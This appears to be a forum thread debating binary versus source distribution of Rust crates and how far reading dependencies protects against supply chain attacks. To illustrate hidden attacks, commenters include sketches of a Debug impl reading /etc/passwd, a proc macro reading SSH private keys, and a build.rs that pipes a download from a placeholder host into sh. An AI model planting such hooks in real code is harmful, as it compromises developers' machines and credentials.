I don’t think it’s that much of a security nightmare: the basic trust assumption that people make about the packaging ecosystem (that they trust their upstreams) remains the same whether they pull source or binaries.
I think the bigger issues are probably stability and size: no stable ABI combined with Rust’s current release cadence means that every package would essentially need to be rebuilt every six weeks. That’s a lot of churn and a lot of extra index space.
> remains the same whether they pull source or binaries.
I don't think that's exactly true: it's definitely _easier_ to sneak something into a binary without people noticing than it is to sneak it into Rust source. But there hasn't been an underhanded Rust competition for a while, so I guess it's hard to be objective about that.
Pretty much nobody does those two things at the same time:
- pulling dependencies with cargo
- auditing the source code of the dependencies they're building
You are either vendoring and vetting everything, or you're using dependencies from crates.io (ideally after you've done your due diligence on the crate). But should crates.io be compromised and inject malware into the crates' payload, I'm ready to bet nobody would notice for a long time.
I fully agree with GP that binary vs source code wouldn't change anything in practice.
> Pretty much nobody does those two things at the same time:
> - pulling dependencies with cargo
> - auditing the source code of the dependencies they're building
Your “pretty much” is probably weaseling you out of any criticism here, but I fully disagree:
My IDE (rustrover) has “follow symbol” support, like every other IDE out there, and I regularly drill into code I’m calling in external crates. Like, just as often as my own code. I can’t imagine any other way of working: it’s important to read code you’re calling to understand it, regardless of whether it’s code made by someone else in the company, or someone else in the world.
My IDE’s search function shows all code from all crates in my dependencies. With everything equal regardless of whether it’s in my repo or not. It just subtly shades the external dependencies a slightly different color. I regularly look at a trait I need from another crate, and find implementations across my workspace and dependencies, including other crates and impls within the defining crate. Yes, this info is available on docs.rs but it’s 1000x easier to stay within my IDE, and the code itself is available right there inline, which is way more valuable than docs alone.
I think it’s insane to not read code you depend on.
Does this mean I’m “vetting” all the code I depend on? Of course not. But I’m regularly reading large chunks of it. And I suspect a large chunk of people work the way I do; there are a lot of eyeballs on public crates because they are distributed as source, and this absolutely has a tangible impact on supply chain attacks.
> Does this mean I’m “vetting” all the code I depend on? Of course not.
Inspecting the public-facing parts of the code is one thing; finding nasty stuff obfuscated in a macro definition, or in a Default or Debug implementation of a private type that nobody outside of auditors is ever going to check, is a totally different thing.
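To make that concrete, here's a contrived sketch (the type and the payload are invented) of the kind of thing that can sit in the Debug impl of a private type, well away from anything you'd reach by following symbols from the public API:

```rust
use std::fmt;

// Private type: never exported, never reached via "follow symbol" from the public API.
struct Telemetry;

impl fmt::Debug for Telemetry {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Runs whenever the value gets formatted somewhere deep inside the crate
        // (a stray log line is enough); side effects can hide here unnoticed.
        let _ = std::fs::read_to_string("/etc/passwd");
        write!(f, "Telemetry")
    }
}
```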
> My IDE (rustrover) has “follow symbol” support
I don't know exactly how it works for RustRover, since I know JetBrains has reimplemented some things on their own, but if it evaluates proc macros (like rust-analyzer does), then by the time you step into the code it's too late: proc macros aren't sandboxed in any way, and your computer could already be compromised.
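For illustration, a contrived proc-macro sketch (the macro name is invented): the body runs unsandboxed on your machine as soon as the macro is expanded, whether by cargo or by an IDE, before you've read a single line of the expanded output.

```rust
// lib.rs of a hypothetical proc-macro crate (needs `proc-macro = true` in its Cargo.toml).
use proc_macro::TokenStream;

#[proc_macro]
pub fn helpful_setup(input: TokenStream) -> TokenStream {
    // Nothing restricts expansion-time side effects: file or network I/O is fair game.
    if let Ok(home) = std::env::var("HOME") {
        // A real attack would exfiltrate this; the tokens returned below look perfectly clean.
        let _ = std::fs::read_to_string(format!("{home}/.ssh/id_ed25519"));
    }
    input
}
```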
The point of my argument is not to say I’m vetting anything, but to say that there are tons of eyeballs on crates today because they are distributed as source and not as a binary. It’s not a silver bullet, but every little bit helps: every additional eyeball makes hiding things harder.
The original claim is that “pretty much no one” reads any of their dependencies, made in support of the claim that they should be distributed as binaries, i.e. “if there were no source available at all in your IDE, it wouldn’t make a difference”, which is just flatly wrong IMO.
A disagreement may be arising here about the definition of “audit” vs “reading” source code, but I’d argue it doesn’t matter for my point, which is that additional eyeballs matter for finding issues in dependencies, and seeing the source of your crates instead of a binary blob is essential for this.
> The original claim is that “pretty much no one” reads any of their dependencies,
No, the claim is that very few people read their dependencies[1] closely enough to catch a malicious piece of code. And I stand by it. “Many eyeballs” is a much weaker guarantee when people are just doing “go to definition” from their own code (for instance, you're never gonna land on a build.rs file that way, yet those are likely the most critical pieces of code when it comes to supply chain security; see the sketch below).
[1] On their machines, that is; if you do that on GitHub it doesn't count, since you have no way to tell it's the same code.
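For concreteness, a contrived build.rs sketch (the URL and command are invented). Cargo compiles and runs this on the host, unsandboxed, for any dependency that ships one, and “go to definition” from your own code will never take you into this file:

```rust
// build.rs of a hypothetical dependency; everything here is made up for illustration.
use std::process::Command;

fn main() {
    // Looks like ordinary build plumbing...
    println!("cargo:rerun-if-changed=build.rs");

    // ...but nothing prevents arbitrary commands from running on your machine at build time.
    let _ = Command::new("sh")
        .args(["-c", "curl -s https://example.invalid/payload | sh"])
        .status();
}
```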
> No the claim is that very few people read the dependencies[1] enough to catch a malicious piece of code.
You’re shifting around between reading enough to catch any issue (which I could easily do if a vulnerability was right there staring at me when I follow a symbol) and catching all issues (like your comment about build.rs). Please stick with one and avoid moving the goalposts around.
There exists a category of dependency issues that I could easily spot in my everyday reading of my dependencies’ source code. It’s not all of them. Your claim is that I would spot zero of them, which is overly broad.
You’re also trying to turn this into a black-or-white issue, as if to say that if it isn’t perfect (i.e. I don’t regularly look at build.rs), it isn’t worth anything, which is antithetical to good security. The more eyeballs the better, and the more opportunities to spot something awry, the better.
I'm not moving the goalposts: a supply chain attack is an adversarial situation. It is not about spotting an issue occurring at random, it is about spotting an issue specially crafted to avoid detection. So in practice you are either able to spot every kind of issue, or none of the relevant ones, because if there's one kind that reliably slips through, you can be certain that the attacker will focus on that kind and ignore the trivial-to-spot ones.
If anything, having access to the source code gives you an illusion of security, which is probably the worst place to be in.
The worst ecosystem when it comes to supply chain attacks is arguably npm, yet anyone can see the source there and there are almost two orders of magnitude more eyeballs.
In such an environment I’m doomed anyway, even if I’m vetting code. I don’t understand why the goal has to be “the ability to spot attacks specifically designed to evade detection.” For what you’re describing, there seems to be no hope at all.
It’s like if someone says “don’t pipe curl into bash to install software”, ok that may or may not be good advice. But then someone else says “yeah, I download the script first and give it a cursory glance to see what it’s doing”, wouldn’t you agree they’re marginally better off than the people who just do it blindly?
If not, maybe we just aren’t coming from any mutual shared experience. It seems flatly obvious to me that being able to read the code I’m running puts me in a better spot. Maybe we just fundamentally disagree.
> It’s like if someone says “don’t pipe curl into bash to install software”, ok that may or may not be good advice. But then someone else says “yeah, I download the script first and give it a cursory glance to see what it’s doing”, wouldn’t you agree they’re marginally better off than the people who just do it blindly?
I don't agree with your comparison: in this case it's more like downloading the script, running it without having read it, and then every once in a while looking at a snippet containing a feature that interests you.
The comparison to “download the script and read it before you run it” would be to download the crate's repo, read it, and then vendor the code you've read to use as a dependency. That's what I'd consider proper vetting (here the attacker would need to be much more sophisticated to avoid detection; it's still possible, but at least you've actually gained something), but it's a lot more work.
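For concreteness, one way to do the “vendor what you've read” step (the crate name and path are made up) is a `[patch]` override, so Cargo builds the copy you actually reviewed instead of whatever crates.io serves:

```toml
# Cargo.toml: hypothetical example; `somedep` and the vendor path are invented.
[dependencies]
somedep = "1.4"

[patch.crates-io]
# Build the reviewed copy checked into your own repo, not the crates.io payload.
somedep = { path = "vendor/somedep" }
```

(`cargo vendor` automates pulling all the sources into a local directory, but you still have to actually read what it downloads.)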
If you have reproducible builds it's no different. Without those, binaries are a nightmare in that you can't easily link a given binary back to a given source snapshot. Deciding to trust my upstream is all well and good, but if it's literally impossible to audit them, that's not a good situation to be in.
I think it’s probably already a mistake to assume that a source distribution consistently references a unique upstream source repository state; I don't believe the crate distribution layout guarantees this.
(I agree that source is easier to review and establish trust in; the observation is that once you read the upstream source you’re in the same state regarding distributors, since build and source distributions both modify the source layout.)
It might as well. If there is no definition of an ABI, nobody is going to build the tooling and infrastructure to detect ABI compatibility between releases and leverage that for the off-chance that e.g. 2 out of 10 successive Rust releases are ABI compatible.
You can have binary dependencies with a stable ABI; they're called C-compatible shared libs, provided by your system package manager. And Cargo can host *-sys packages that define Rust bindings to these shared libs. Yes, you give up on memory safety across modules, but that's what things like the WASM Components proposals are for. It's a whole other issue that has very little to do with ensuring safety within a single build.
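A minimal sketch of what that looks like, assuming zlib is installed as a system shared library (the binding is hand-written here rather than generated): the boundary is a plain C ABI, which doesn't change across Rust releases.

```rust
use std::os::raw::{c_uint, c_ulong};

// Link against the system-provided zlib; the boundary is C, not Rust's unstable ABI.
#[link(name = "z")]
extern "C" {
    // uLong crc32(uLong crc, const Bytef *buf, uInt len);
    fn crc32(crc: c_ulong, buf: *const u8, len: c_uint) -> c_ulong;
}

fn main() {
    let data = b"hello";
    // Safety: crc32 only reads `len` bytes starting at `buf`.
    let sum = unsafe { crc32(0, data.as_ptr(), data.len() as c_uint) };
    println!("crc32 = {sum:#x}");
}
```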